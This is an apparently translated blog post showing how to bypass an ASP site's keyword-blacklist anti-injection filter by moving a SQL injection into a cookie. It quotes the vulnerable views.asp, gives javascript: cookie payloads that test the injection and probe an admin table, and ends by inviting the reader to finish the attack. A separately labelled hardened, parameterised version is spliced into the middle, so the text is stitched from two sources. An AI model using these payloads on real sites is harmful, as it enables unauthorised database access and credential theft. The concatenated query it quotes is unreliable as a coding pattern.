Xiaoz Blog
In fact the code does contain a SQL injection, but the end of conn.asp reads:
Set Conn = Nothing
Response.Write "database connection error"
Response.End
End If
%>
<!--#include file="sqlcheck.asp"-->
Opening sqlcheck.asp, part of the code is as follows:
For Fy_x = 0 To UBound(Fy_Cs)
    If Fy_Cs(Fy_x) <> "" Then
        ' Keyword blacklist applied to each enumerated parameter name.
        ' The page's extraction stripped single quotes; the first pattern is assumed to be "'" (apostrophe).
        If InStr(LCase(Request(Fy_Cs(Fy_x))), "'") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), "and") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), "select") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), "update") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), "chr") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), "delete%20from") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), ";") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), "insert") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), "mid") <> 0 Or InStr(LCase(Request(Fy_Cs(Fy_x))), "master.") <> 0 Then
            Response.Write "<script language=javascript>alert('An error occurred, please do not try this operation!');history.go(-1);</script>"
            Response.End
        End If
    End If
Next
Quite a lot is filtered: ' | and | select | update | mid | ... and so on.
But it is not a serious problem. Look at the following code from views.asp:
<% hw_id = Request("hw_id")
SQL = "select * from hw where hw_id=" & hw_id & ""
rs.Open SQL, conn, 3, 3
If rs.EOF Then %>
<tr><td height="200" colspan="3" align="center">The item you want to view was not found; you can <a href="search.asp"><font color="#FF0000">click here for a detailed search</font></a>!</td></tr>
<% Else
rs("hw_views") = rs("hw_views") + 1
rs.Update
End If %>
Notice hw_id = Request("hw_id"). If the administrator had written hw_id = Replace(Request("hw_id"), "'", "") or hw_id = Replace(Request("hw_id"), "'", "''") directly, it might have been hard for me.
(PS: ever since anti-injection code caught on in China, programmers have become lazy.)
The Request collection also includes cookies, so no matter how extreme his anti-injection code is, we can ignore it :)
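The fix the post hints at with Replace() still leaves a numeric comparison injectable. A hardened views.asp, added here as an example (it is not the blog's or the original site's code), closes the hole the post describes in three ways: it reads hw_id only from the query string instead of the generic Request() collection, which falls back to Form and then Cookies; it allow-lists the value's shape (a short positive integer) instead of blacklisting SQL keywords; and it passes the value as a typed ADODB parameter so the database never interprets it as SQL. It assumes conn.asp has opened an ADODB.Connection named conn and that the hw table and hw_id/hw_views columns exist as shown on the page.

```vbscript
<%
' Hardened views.asp (added example, not the original site's code).
' Assumes conn.asp has already opened an ADODB.Connection named conn.
Dim rawId, hw_id, re, cmd, rs

' Read from the collection we actually mean. Request("hw_id") would also
' search Form and Cookies, which is the bypass the post relies on.
rawId = Trim(Request.QueryString("hw_id"))

' Allow-list: an item id is 1 to 9 decimal digits and nothing else.
' IsNumeric is deliberately avoided because it accepts forms like "1e5".
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "invalid item id"
    Response.End
End If
hw_id = CLng(rawId)

' Parameterised query: the id is bound as adInteger (3), adParamInput (1),
' so even a string containing " and 1=1" could never reach the SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT hw_views FROM hw WHERE hw_id = ?"
cmd.Parameters.Append cmd.CreateParameter("hw_id", 3, 1, , hw_id)
Set rs = cmd.Execute

If rs.EOF Then
%>
<tr><td height="200" colspan="3" align="center">The item you want to view was not found; you can <a href="search.asp"><font color="#FF0000">click here for a detailed search</font></a>!</td></tr>
<%
Else
    ' Counter update reuses the same bound parameter; no string concatenation anywhere.
    cmd.CommandText = "UPDATE hw SET hw_views = hw_views + 1 WHERE hw_id = ?"
    cmd.Execute
End If
rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

With this version the cookie trick from the post simply yields a 400: a cookie named hw_id is never consulted, and a query-string value such as "503 and 1=1" fails the digit check before any database call is made. The sqlcheck.asp blacklist becomes unnecessary for this page, which is the point: input validation and parameter binding belong at the query, not in a keyword filter in front of it.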
The test goes as follows:
http://www.xxx.com/views.asp?hw_id=503
Then clear the address bar and submit: javascript:alert(document.cookie="hw_id="+escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id="+escape("503 and 1=2"))
to determine whether the injection exists.
javascript:alert(document.cookie="hw_id="+escape("506 and (select count(admin_name) from admin)>0"))
OK, the rest is up to you.